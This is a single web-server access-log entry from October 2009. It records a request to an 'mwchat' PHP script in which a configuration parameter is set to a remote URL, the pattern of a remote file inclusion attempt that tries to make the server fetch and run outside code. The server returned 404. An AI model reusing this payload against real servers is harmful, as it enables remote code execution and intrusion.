72.9.225.71 - - [12/Oct/2009:02:05:47 -0400] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
